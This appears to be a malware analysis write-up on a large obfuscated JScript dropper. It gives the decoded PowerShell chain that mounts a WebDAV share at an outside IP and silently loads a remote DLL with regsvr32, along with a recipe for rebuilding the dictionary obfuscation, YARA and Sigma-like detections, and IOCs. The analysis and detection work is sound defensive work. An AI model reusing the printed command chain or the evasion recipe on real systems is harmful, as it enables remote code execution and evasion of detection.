e6252c9256a37701fe38d5a4dabfeab6059a6ab3c3a2051dc3e3edb2fc780eacunclassified-js-webdav-dropper: e6252c92 — 1.37 MB extreme-padded dictionary JScript, WebDAV C2 94.159.113.79
Executive Summary
Eighty-fourth confirmed sibling in the unclassified-js-webdav-dropper family: a 1.37 MB single-line JScript dropper using a 62-entry dictionary lookup table with extreme key padding (individual keys exceed 1,000 characters). The decoded payload mounts a WebDAV share at 94.159.113.79:8888 and silently registers a remote DLL (82643222928915.dll) via regsvr32 /s. A timeout 1 anti-emulation gate precedes execution. PowerShell -EncodedCommand wrapper present. Static-only analysis (JScript is not a supported CAPE binary class). ^[file.txt]
What It Is
- File:
e6252c9256a37701fe38d5a4dabfeab6059a6ab3c3a2051dc3e3edb2fc780eac.bin(1,376,509 bytes) ^[file.txt] - Type: ASCII text, single line, no line terminators ^[file.txt]
- Language: JScript (Windows Script Host)
- Obfuscation dialect: Dictionary lookup-table (62 entries) with extreme key padding. Dictionary object name is a 1,268-character random-alphabet string (
pepbtvuucjsiafwlsdylnjkoxxrnmogyhjzgqfwffrmxobojhbxezzreoamsqdfymzpttfbpfvuprfiqjwzzaljswyzbyzqlduahhtfstlrwwdsnvhkrqcrintxthqzjktolcbulinuzlazajjcppsdjrpvqsqxsqzxpntctmkubbpnlmfjuvqqkemphgrpupsbmwjqgrexbchbtfsjwkbsbsatzclinivrtuoishiemgcwisoiqromgmukoiwysvrffwncijnpzdbwbsllttogtkkctjfkquloowogpardqmnazftjmjylwmohlalimkecijycgoxuwikudrygtziuxltwtyfayocqnvkzzjdyloyjgrgswrelagoysforayflmumyxdhugvyfxancsqolobcgzymsnidkbbfhygrsjfmxdivxnfutthsdtcszxhxbrcfzhulhaopgajdtevqyraodhkqfqztlnlwtsdiljvjgiimmvdppljezzikimqeamijndahvtqxskkucfjrhtcgekorzxdktmbwqhaywlcesrcjpqefhqwlymsegxhintjuowhwcnmnidwbsnbvswgwkegskbnvolklljdfyazvllwjbovakbxvbupmkjlapviunrxesmrchkscbpsumlswweanmertypofiakaaoaukilpglsjkpyzsoktptmzeuekrwhsewikeirrlwuvhbquutgmynqawekqgvlequfegbzhjssqutlyshcjkcrdzpimrrhexoxeotyeeqhsahctzmoyihqnlljwkupukmkoomdgwkrbeygjtvqzqfgmscrfsvfzwfygkaztqowdniraaqugkqrhfpxzccarjacmuarmkuyyyfcukhuxfxoeclqehvltcwtrrbzmukvtztwcfjybsdzdbudxbzthxzwgujikkxyofnzmxgfjxcwdcxrumokvsuylnbnznlykyvaefafsifwjaxsrsdyfbkpyzdyickbaytuwejxtpfbtrksvqhazvyuuvjkkhrucunfkdgbvuivjeltlshpaotgluttevinfejzsxrdzlmhjajtgbqxpvhrmncrudmhopekvhaqxcyvqdauuowvpslkdhgsvhtmaqlimaggpzbpwqmrjnsdpgmjxqqphfbpzipxrwhlwrjefwbxsebvhmltxbcrlexiuxwqunuqpxiszpguokqvnsaoekkkoscpexacfekulcannoncalculatinglumpy). Each of the 62 keys is a 1,000–2,000 character noise string ending with a short natural-language compound phrase (e.g.,...transportgigantic,...slowplanthelp,...commonmeaslybirthday). - Family ascription: Confirmed sibling of unclassified-js-webdav-dropper — identical execution engine (dictionary lookup →
Function('return this')()→WScript.Shell.Run→ PowerShell-EncodedCommand→net use+regsvr32 /sover WebDAV UNC), same94.159.113.xC2 subnet, same numeric payload filename pattern.
How It Works
The script is a single semicolon-delimited statement sequence: ^[strings.txt]
var <name> = []— initializes the dictionary object (1,268-character variable name).- 62 assignments of the form
<name>['<extremely-long-key>'] = '<char>'— populate the lookup table. Each key is unique and maps to a single ASCII character. Function('' + <name>['key1'] + <name>['key2'] + ... + '')()— assembles the payload by concatenating 407 dictionary lookups, passes the resulting string to theFunctionconstructor, and immediately invokes it.
The decoded JavaScript payload is: ^[manual-decode]
returnthis.WScript.CreateObject('WScript.Shell').run(
"powershell -EncodedCommand <base64>", 0, false
);
The Base64 string (UTF-16LE) decodes to: ^[manual-decode]
timeout 1;
cmd /c net use \\94.159.113.79@8888\davwwwroot\;
cmd /c regsvr32 /s \\94.159.113.79@8888\davwwwroot\82643222928915.dll
The timeout 1 acts as an anti-emulation gate (delays execution by one second). regsvr32 /s silently registers the remote DLL without UI. 0, false in the Run call hides the window and does not wait for completion.
Decompiled Behavior
Not applicable — this sample is a JScript text file, not a PE binary. No Ghidra, radare2, or capa analysis is meaningful. Static deobfuscation was performed via Python regex extraction of dictionary assignments and Function argument reconstruction.
C2 Infrastructure
| Indicator | Value | Notes |
|---|---|---|
| WebDAV mount | \\94.159.113.79@8888\davwwwroot\ |
Same /24 subnet as 66th sibling fbdd83ad (.84), 68th fe261d49 (.79), 78th dbdb99f1 (.86), 81st dfb1eb98 (.82), and 65th fa8c6d74 (.204) ^[manual-decode] |
| Payload filename | 82643222928915.dll |
Numeric-only filename, consistent with family pattern |
| Execution vector | regsvr32 /s |
Silent DLL registration over UNC path ^[manual-decode] |
| Transport | HTTP (WebDAV) | Port 8888, non-standard WebDAV port ^[manual-decode] |
| Anti-emulation | timeout 1 |
One-second delay before payload execution ^[manual-decode] |
Interesting Tidbits
- Extreme key padding: Individual dictionary keys exceed 1,000 characters, making the file 1.37 MB despite only 62 entries and a ~400-character payload. The padding is random lowercase alphabet noise with no semantic content until the final 10–20 characters. ^[manual-decode]
- Variable name length: The dictionary object name is 1,268 characters — fourth-longest in the family after
dfb1eb98(3,787 chars),dbdb99f1(2,337 chars), andf8dce7df(2,478 chars). ^[manual-decode] - PowerShell wrapper: Uses
-EncodedCommandrather than-windowstyle hidden, a minor variation from some batch-mode siblings. The encoded payload contains the fullnet use+regsvr32chain. ^[manual-decode] - No persistence, no decoy, no sandbox gate: Unlike batch siblings that launch
wordpador check LCID, this JScript variant is minimal — no decoy process, no locale check, no startup-folder copy. ^[manual-decode] - File size anomaly: At 1.37 MB, this is one of the largest JScript droppers in the corpus. The bloat is purely padding; the functional script would be <2 KB if deobfuscated.
How To Mess With It (Homelab Replication)
- Encode your payload. Write a JScript command that uses
WScript.Shell.Runto execute a benign command (e.g.,calc.exe). - Build the dictionary. Generate 62 random noise strings (1,000+ chars each) and map them to the characters of your payload.
- Assemble the script. Concatenate:
var <longname>=[]; <longname>['<key1>']='a'; ... ; Function('' + <longname>['<key1>'] + ...)() - Test in WSH. Save as
.js, double-click in Windows. Verifywscript.exespawns the target process. - Detection exercise. Run your replica against your EDR. Confirm that static string matching fails but behavioral detection (
wscript.exe→powershell.exe→cmd.exechain) catches it.
Deployable Signatures
YARA Rule
rule js_webdav_dropper_extreme_padding {
meta:
description = "JScript WebDAV dropper with extreme dictionary key padding"
author = "PacketPursuit"
date = "2026-07-21"
sha256 = "e6252c9256a37701fe38d5a4dabfeab6059a6ab3c3a2051dc3e3edb2fc780eac"
family = "unclassified-js-webdav-dropper"
strings:
$a = /var\s+\w{500,}\s*=\s*\[\]/
$b = /\w{500,}\['\w{500,}'\]\s*=\s*'[\x00-\x7F]'
$c = "Function('"
$d = "EncodedCommand"
$e = "davwwwroot"
condition:
filesize > 500KB and
#a >= 1 and
#b >= 50 and
all of ($c, $d, $e)
}
Behavioral Hunt Query (Sigma-like)
Process creation chain detection:
title: JScript WebDAV Dropper Execution Chain
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\\wscript.exe'
Image|endswith: '\\powershell.exe'
CommandLine|contains:
- 'EncodedCommand'
- 'davwwwroot'
condition: selection
falsepositives:
- Unknown
level: high
IOC List
| Type | Value |
|---|---|
| SHA-256 | e6252c9256a37701fe38d5a4dabfeab6059a6ab3c3a2051dc3e3edb2fc780eac |
| Script size | 1,376,509 bytes |
| C2 IP | 94.159.113.79 |
| C2 port | 8888 |
| WebDAV path | \\94.159.113.79@8888\davwwwroot\ |
| Payload | 82643222928915.dll |
| Execution | regsvr32 /s |
| Anti-emulation | timeout 1 |
Behavioral Fingerprint
This JScript dropper initializes a dictionary object with an extremely long variable name (500–3,700+ characters), populates 36–100 entries mapping massive noise keys to single characters, then assembles a payload via the Function('return this')() constructor. The resulting command spawns powershell.exe -EncodedCommand, which decodes to cmd.exe executing net use against a host@8888\davwwwroot\ UNC path followed by regsvr32 /s on a numeric-only DLL filename. No persistence, no decoy, no sandbox gates. Typical file size 500 KB–3.5 MB due to padding.
Detection Signatures
- CAPE: Skipped — file type
ASCII text, with very long linesis not a supported binary class for detonation. ^[dynamic-analysis.md] - capa: No meaningful matches (not a PE binary). ^[capa.txt]
- floss: No meaningful matches (not a PE binary). ^[floss.txt]
References
- unclassified-js-webdav-dropper — Family entity page
- js-dictionary-char-lookup-obfuscation — Technique page for the obfuscation scheme
- webdav-regsvr32-dll-sideloading — Technique page for the execution chain
- SHA-256:
e6252c9256a37701fe38d5a4dabfeab6059a6ab3c3a2051dc3e3edb2fc780eac
Provenance
Analysis performed on pp-hermes (Lab1BU, <lan>) using Python 3.11 regex extraction. File read from <sample e6252c9256a3.bin>. Dictionary assignments parsed via re.search(r"lumpy\['([^']+)'\]\s*=\s*'([^']+)'\s*$", ...) and Function argument reconstructed via re.findall(r"lumpy\['([^']+)'\]", ...). Base64 decoded with Python base64.b64decode() and UTF-16LE transcoding. No CAPE detonation available (JScript not a supported binary class). ^[file.txt] ^[triage.json] ^[dynamic-analysis.md]